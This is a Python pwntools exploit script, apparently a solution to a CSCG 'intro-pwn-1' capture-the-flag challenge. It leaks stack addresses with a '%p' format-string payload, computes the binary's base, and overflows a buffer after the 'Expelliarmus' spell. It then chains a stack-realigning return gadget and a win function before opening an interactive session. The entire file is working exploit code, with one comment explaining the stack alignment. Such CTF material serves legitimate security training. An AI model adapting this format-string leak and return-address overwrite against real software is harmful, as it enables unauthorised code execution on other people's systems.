blob: a04755163550d4b5191454a80ea4dfab2e4b3f53 (
plain) (
blame)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
|
from pwn import *
import os
if args.debug:
p = process("ncat localhost 1024".split())
else:
if len(sys.argv) < 2:
print("USAGE: exploit.py <ID>")
sys.exit(1)
p = process("ncat --ssl {}-1024-intro-pwn-1.challenge.cscg.live 1337"
.format(sys.argv[1]).split())
p.recvuntil(b"Enter your witch name:")
p.sendline(b"%p " * 50)
leaked = p.recvuntil(b"enter your magic spell:")
leak_vals = leaked.decode().split(" ")
for i,v in enumerate(leak_vals):
print(i, "->", v)
base = int(leak_vals[41], 16) - 2537
win = base + 0x9ec
extra_ret = base + 0x0b2d
print("RERET:", hex(extra_ret))
print("WIN:", hex(win))
# Why do we need to realign the stack with another return?
# The `movaps xmmword ptr` instruction requires the stack pointer to be
# 16 byte aligned. Because of this we need to return twice, such that
# the stack pointer moves down another 8 bytes.
p.send("Expelliarmus\x00" + "A" * 251)
p.send(p64(extra_ret))
p.send(p64(win))
p.send("\n")
p.interactive()
|
